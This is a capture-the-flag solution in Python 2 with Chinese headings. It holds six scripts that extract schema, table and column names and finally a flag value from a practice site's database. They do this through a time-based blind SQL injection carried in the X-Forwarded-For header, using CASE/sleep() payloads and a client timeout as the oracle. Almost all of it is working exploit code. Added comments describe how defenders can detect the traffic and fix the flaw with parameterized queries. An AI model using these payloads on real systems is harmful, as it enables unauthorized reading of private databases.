暴力求数据库名:
# -*- coding:utf-8 -*-
# Recovers schema names one character at a time through a time-based blind
# SQL injection carried in the X-Forwarded-For header: the injected CASE
# expression calls sleep(5) only when the guessed character matches, and the
# 4 s client timeout turns that delay into an exception, which is the only
# "true" signal the script ever sees. Python 2 code (print statements,
# string.lowercase). Defender's view: every probe is a separate GET whose
# X-Forwarded-For value contains SQL keywords (select, information_schema,
# sleep), one request per candidate character per position, so the traffic
# stands out in access logs by header content and by response times
# clustering at the sleep() delay; the server-side fix is to never
# interpolate a request header into SQL (use a parameterized query).
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
# Candidate alphabet for each position. string.punctuation contains the
# single quote, which presumably breaks the injected query instead of
# delaying it, so names containing such characters would not be recovered.
guess = string.lowercase+string.uppercase+string.digits+string.punctuation
database=[]  # recovered schema names, in information_schema.SCHEMATA offset order
for database_number in range(0,100): # assume at most the first 100 schemas are probed
    databasename=''
    for i in range(1,100): # brute-force the name length; assumed to be under 100 characters
        flag=0  # becomes 1 once some candidate matched at position i
        for str in guess: # brute-force the character at this position (note: shadows builtin str)
            #print 'trying ',str
            # "'+" closes the quoted value the server wraps the header in;
            # substring(... from %d for 1) picks the 1-based position i of the
            # schema name found at offset database_number.
            headers = {"X-forwarded-for":"'+"+" (select case when (substring((select schema_name from information_schema.SCHEMATA limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(database_number,i,str)}
            try:
                res=requests.get(url,headers=headers,timeout=4)
            except:
                # Bare except: any failure (connection refused, DNS error, reset)
                # is treated exactly like the timeout, i.e. as a matching
                # character, so a network hiccup silently corrupts the result.
                # Catching requests.exceptions.ReadTimeout would be the narrower,
                # safer choice.
                databasename+=str
                flag=1
                print '正在扫描第%d个数据库名,the databasename now is '%(database_number+1) ,databasename
                break
        if flag==0:
            break  # no candidate matched at position i: the name is complete
    database.append(databasename)
    if i==1 and flag==0:
        # Nothing matched at position 1: no schema at this offset, so stop.
        # Relies on the inner loop variable i still being visible here.
        print '扫描完成'
        break
for i in range(len(database)):
    print database[i]
暴力求数据表数目:
# -*- coding:utf-8 -*-
# Finds the total row count of information_schema.TABLES (all schemas: the
# injected query has no WHERE clause) by testing each integer 0..499 in turn
# with a time-based blind SQL injection in the X-Forwarded-For header; the
# first request that hits the 4 s client timeout (server slept 5 s) is taken
# as the answer. Python 2 code. Defender's view: one GET per candidate
# value, each carrying SQL keywords in the X-Forwarded-For header, with the
# final response delayed by sleep() -- easy to pick out of access logs.
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation  # unused in this script
for table_number in range(0,500):
    print 'trying',table_number
    # "'+" closes the quoted value the header is inserted into; the CASE sleeps
    # only when count(table_name) equals the current guess.
    headers = {"X-forwarded-for":"'+"+" (select case when (select count(table_name) from information_schema.TABLES ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)}
    try:
        res=requests.get(url,headers=headers,timeout=4)
    except:
        # Bare except: a connection error would also land here and be
        # reported as the count; requests.exceptions.ReadTimeout is narrower.
        print table_number
        break
暴力求表名:
# -*- coding:utf-8 -*-
# Recovers a table name from information_schema.TABLES one character at a
# time, using the same time-based blind SQL injection in the X-Forwarded-For
# header as the schema-name script: sleep(5) on a matching character, 4 s
# client timeout as the oracle. Python 2 code. Defender's view: one GET per
# candidate character per position, SQL keywords in the header value,
# response times clustering at the sleep() delay; fix by never building SQL
# from request headers (parameterized query).
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation
tables=[]  # recovered table names, in information_schema.TABLES offset order
for table_number in range(41,42): # original comment said "assume start from the 60th"; the range probes offset 41 only
    tablename=''
    for i in range(1,100): # brute-force the name length; assumed to be under 100 characters
        flag=0  # becomes 1 once some candidate matched at position i
        for str in guess: # brute-force the character at this position (note: shadows builtin str)
            # substring(... from %d for 1) picks the 1-based position i of the
            # table name found at offset table_number.
            headers = {"X-forwarded-for":"'+"+" (select case when (substring((select table_name from information_schema.TABLES limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(table_number,i,str)}
            try:
                res=requests.get(url,headers=headers,timeout=4)
            except:
                # Bare except: any request failure counts as a match, not only
                # the timeout; requests.exceptions.ReadTimeout would be narrower.
                tablename+=str
                flag=1
                # NOTE: the message still says "数据库名" (database name) although a table name is scanned here.
                print '正在扫描第%d个数据库名,the tablename now is '%(table_number+1) ,tablename
                break
        if flag==0:
            break  # no candidate matched at position i: the name is complete
    tables.append(tablename)
    if i==1 and flag==0:
        # Nothing matched at position 1: no table at this offset, so stop.
        # Relies on the inner loop variable i still being visible here.
        print '扫描完成'
        break
for i in range(len(tables)):
    print tables[i]
暴力求列数目:
# -*- coding:utf-8 -*-
# Finds the total row count of information_schema.COLUMNS (all schemas: the
# injected query has no WHERE clause) by testing each integer 0..999 in turn
# with a time-based blind SQL injection in the X-Forwarded-For header; the
# first request that hits the 4 s client timeout (server slept 5 s) is taken
# as the answer. Python 2 code. Defender's view: one GET per candidate
# value, each with SQL keywords in the X-Forwarded-For header.
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation  # unused in this script
database=[]  # unused in this script
for table_number in range(0,1000):
    print 'trying',table_number
    # The CASE sleeps only when count(COLUMN_name) equals the current guess.
    headers = {"X-forwarded-for":"'+"+" (select case when (select count(COLUMN_name) from information_schema.COLUMNS ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)}
    try:
        res=requests.get(url,headers=headers,timeout=4)
    except:
        # Bare except: a connection error would also be reported as the
        # count; requests.exceptions.ReadTimeout is the narrower choice.
        print table_number
        break
暴力求列名:
# -*- coding:utf-8 -*-
# Recovers a column name from information_schema.COLUMNS one character at a
# time, using a time-based blind SQL injection in the X-Forwarded-For
# header: sleep(5) on a matching character, 4 s client timeout as the
# oracle. Python 2 code. Defender's view: one GET per candidate character
# per position, SQL keywords in the header value, response times clustering
# at the sleep() delay; fix by never building SQL from request headers
# (parameterized query).
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation
columns=[]  # recovered column names, in information_schema.COLUMNS offset order
for column_number in range(482,483): # original comment said "assume start from the 60th"; the range probes offset 482 only
    cloumnname=''  # (sic) kept as written; the name is used throughout this script
    for i in range(1,100): # brute-force the name length; assumed to be under 100 characters
        flag=0  # becomes 1 once some candidate matched at position i
        for str in guess: # brute-force the character at this position (note: shadows builtin str)
            #print 'trying',str
            # substring(... from %d for 1) picks the 1-based position i of the
            # column name found at offset column_number.
            headers = {"X-forwarded-for":"'+"+" (select case when (substring((select COLUMN_name from information_schema.COLUMNS limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(column_number,i,str)}
            try:
                res=requests.get(url,headers=headers,timeout=4)
            except:
                # Bare except: any request failure counts as a match, not only
                # the timeout; requests.exceptions.ReadTimeout would be narrower.
                cloumnname+=str
                flag=1
                print '正在扫描第%d个列名,the cloumnname now is '%(column_number+1) ,cloumnname
                break
        if flag==0:
            break  # no candidate matched at position i: the name is complete
    columns.append(cloumnname)
    if i==1 and flag==0:
        # Nothing matched at position 1: no column at this offset, so stop.
        # Relies on the inner loop variable i still being visible here.
        print '扫描完成'
        break
for i in range(len(columns)):
    print columns[i]
暴力求内容:
#-*-coding:utf-8-*-
# Reads the value of column "flag" in table "flag" one character at a time
# through a time-based blind SQL injection in the x-forwarded-for header:
# sleep(7) on a matching character, 6 s client timeout as the oracle.
# Unlike the earlier scripts this one catches only ReadTimeout, so a plain
# connection error is not mistaken for a match. Python 2 code. Defender's
# view: one GET per candidate character per position with SQL keywords in
# the header and responses delayed by sleep(); the fix is a parameterized
# query for any header value that reaches SQL.
import requests
import string
url="http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess=string.lowercase + string.uppercase + string.digits  # no punctuation in this alphabet
flag=""  # the recovered value so far (also the SQL table/column name below)
for i in range(1,100): # brute-force the value length; assumed to be under 100 characters
    havetry=0  # becomes 1 once some candidate matched at position i
    for str in guess:  # note: shadows builtin str
        # "' +" closes the quoted value; substring(... from %d for 1) picks the
        # 1-based position i of the flag value.
        headers={"x-forwarded-for":"' +(select case when (substring((select flag from flag ) from %d for 1 )='%s') then sleep(7) else 1 end ) and '1'='1" %(i,str)}
        try:
            res=requests.get(url,headers=headers,timeout=6)
        except requests.exceptions.ReadTimeout, e:  # Python 2 except syntax
            havetry=1
            flag = flag + str
            print "flag:", flag
            break
    if havetry==0:
        break  # no candidate matched at position i: the value is complete
print 'result:' + flag
提交的话再将内容放在ctf{}中提交。